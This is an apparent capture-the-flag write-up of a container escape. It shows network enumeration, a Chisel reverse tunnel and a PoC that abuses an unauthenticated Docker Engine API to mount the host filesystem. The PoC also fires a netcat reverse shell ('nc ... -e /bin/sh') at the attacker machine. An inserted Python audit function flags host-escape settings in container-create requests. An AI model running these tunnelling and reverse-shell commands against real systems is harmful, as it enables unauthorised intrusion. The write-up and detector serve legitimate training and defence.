Since the Docker Desktop vulnerability was already in view, I looked it up and found the following PoC.
Right, now enumerate the network so I can aim the exploit.
www-data@821fbd6a43fa:~/app$ ss -lntp
ss -lntp
State Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
LISTEN 0 511 0.0.0.0:80 0.0.0.0:* users:(("nginx",pid=13,fd=9),("nginx",pid=12,fd=9))
LISTEN 0 4096 127.0.0.11:37787 0.0.0.0:*
LISTEN 0 4096 *:9000 *:*
www-data@821fbd6a43fa:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host proto kernel_lo
valid_lft forever preferred_lft forever
2: eth0@if7: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 3e:c7:50:15:98:b0 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 172.18.0.3/16 brd 172.18.255.255 scope global eth0
valid_lft forever preferred_lft forever
www-data@821fbd6a43fa:/$
www-data@821fbd6a43fa:/$ ip route
ip route
default via 172.18.0.1 dev eth0
172.18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.3
www-data@821fbd6a43fa:/$
A quick search (link below) shows that 127.0.0.11 is a name-resolution service.
It should be visible in resolv.conf, so take a look.
www-data@821fbd6a43fa:/etc$ cat resolv.conf
cat resolv.conf
# Generated by Docker Engine.
# This file can be edited; Docker Engine will not make further changes once it
# has been modified.
nameserver 127.0.0.11
options ndots:0
# Based on host file: '/etc/resolv.conf' (internal resolver)
# ExtServers: [host(192.168.65.7)]
# Overrides: []
# Option ndots from: internal
www-data@821fbd6a43fa:/etc$
192.168.65.7 appears to be the host, so check whether port 2375 is open.
www-data@821fbd6a43fa:/etc$ curl http://192.168.65.7:2375
curl http://192.168.65.7:2375
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 29 0 29 0 0 4878 0 --:--:-- --:--:-- --:--:-- 5800
{"message":"page not found"}
www-data@821fbd6a43fa:/etc$
Looks promising.
Next, set up Chisel and run the exploit from Kali.
┌──(kali㉿kali)-[~/Desktop]
└─$ ./chisel_1.9.0_linux_amd64 server -p 2345 --socks5 --reverse
2025/12/07 09:26:17 server: Reverse tunnelling enabled
2025/12/07 09:26:17 server: Fingerprint YEq1g7zX+eUeM839od8APiSYo3d4lxRiiCM6KuoQ/zc=
2025/12/07 09:26:17 server: Listening on http://0.0.0.0:2345
2025/12/07 09:27:19 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
www-data@821fbd6a43fa:/tmp$ ./chisel client --max-retry-count 2 10.10.14.8:2345 R:socks
< client --max-retry-count 2 10.10.14.8:2345 R:socks
2025/12/07 14:27:24 client: Connecting to ws://10.10.14.8:2345
2025/12/07 14:27:26 client: Connected (Latency 257.825908ms)
It connected, so fire the exploit through the tunnel!
┌──(kali㉿kali)-[~/Desktop]
└─$ proxychains4 -q python3 exploit.py -u http://192.168.65.7:2375 -c 'ls /host_root/'
[+] Container created:
{
"Id": "082c3229301d7499948fa3572a6dc56735a690e49fbf19bc4bffac8bfcf2cdc1",
"Warnings": []
}
[+] Container 082c3229301d7499948fa3572a6dc56735a690e49fbf19bc4bffac8bfcf2cdc1 started successfully!
[+] Container logs:
4ls: /host_root/DumpStack.log.tmp: Permission denied
/ls: /host_root/pagefile.sys: Permission denied
$RECYCLE.BIN
$WinREAgent
Documents and Settings
PerfLogs
Program Files
Program Files (x86)
ProgramData
Recovery
␦System Volume Information
Users
Windows
Windows.old
inetpub
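What the PoC actually asks the engine for is a new container whose bind mount exposes the host filesystem (the /host_root target is visible in the output above; the host-side source path is my assumption). The block below is an added example, not part of the PoC or of this write-up, that audits a Docker Engine containers/create request body for exactly that kind of request, plus the other standard host-escape settings (Privileged, PidMode=host, NetworkMode=host, CapAdd). The sensitive-path list and the two sample bodies are constructed for the example.

```python
"""Audit a Docker Engine 'containers/create' request body for host-escape settings."""
import json

# Host paths whose exposure inside a container amounts to host compromise.
# Starting list for this example (an assumption), not an exhaustive policy.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/proc", "/sys", "/var/run/docker.sock")


def _bind_sources(host_config):
    """Yield host-side source paths from both the legacy Binds list and the Mounts list."""
    for bind in host_config.get("Binds") or []:
        yield bind.split(":", 1)[0]  # "src:dst[:opts]"
    for mount in host_config.get("Mounts") or []:
        if mount.get("Type") == "bind" and mount.get("Source"):
            yield mount["Source"]


def _is_sensitive(src):
    """True if src is one of the sensitive paths or lives underneath one of them."""
    src = src.rstrip("/") or "/"
    return any(src == p or (p != "/" and src.startswith(p + "/")) for p in SENSITIVE_HOST_PATHS)


def assess_container_create(body):
    """Return a list of findings for one create-container body (dict). Empty list means clean."""
    hc = body.get("HostConfig") or {}
    findings = []
    for src in _bind_sources(hc):
        if _is_sensitive(src):
            findings.append(f"bind mount of sensitive host path {src!r}")
    if hc.get("Privileged"):
        findings.append("Privileged=true")
    if hc.get("PidMode") == "host":
        findings.append("PidMode=host")
    if hc.get("NetworkMode") == "host":
        findings.append("NetworkMode=host")
    for cap in hc.get("CapAdd") or []:
        if cap.upper() in ("SYS_ADMIN", "ALL"):
            findings.append(f"CapAdd={cap}")
    return findings


def assess_request_json(raw):
    """Convenience wrapper for a raw JSON request body."""
    return assess_container_create(json.loads(raw))


# Constructed request bodies. The first has the shape of a host-root mount like the one the
# exploit output above implies (source path assumed); the second is an ordinary service container.
SUSPICIOUS_CREATE = json.dumps({
    "Image": "alpine",
    "Cmd": ["sh", "-c", "ls /host_root/"],
    "HostConfig": {"Binds": ["/:/host_root"]},
})
BENIGN_CREATE = json.dumps({
    "Image": "nginx",
    "HostConfig": {
        "Binds": ["/srv/site:/usr/share/nginx/html:ro"],
        "PortBindings": {"80/tcp": [{"HostPort": "8080"}]},
    },
})

if __name__ == "__main__":
    print("suspicious:", assess_request_json(SUSPICIOUS_CREATE))
    print("benign:", assess_request_json(BENIGN_CREATE))
```

This is the logic one would put behind a Docker authorization plugin or a policy proxy in front of the engine socket, and it is also a useful filter over engine audit data after the fact. On its own, though, the root problem is what the curl above demonstrated: an engine API reachable from inside a container with no TLS and no authentication. Auditing the requests only narrows what can be done with that access; closing it is the actual fix.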
Ah, it seems to have hit. Now let's get a reverse shell.
┌──(kali㉿kali)-[~/Desktop]
└─$ proxychains4 -q python3 exploit.py -u http://192.168.65.7:2375 -c 'nc 10.10.14.8 8444 -e /bin/sh'
[+] Container created:
{
"Id": "ffe3adbbf686c0b282518f530931f28a3d66dc8597a0561db73649ffdcf38183",
"Warnings": []
}
[+] Container ffe3adbbf686c0b282518f530931f28a3d66dc8597a0561db73649ffdcf38183 started successfully!
[+] Container logs:
Huh??? Where's Windows????
Summary

With this, privilege escalation succeeded and I obtained root.
There was no Windows at all! This is OS fraud!
I hope this helps fellow security engineers once again.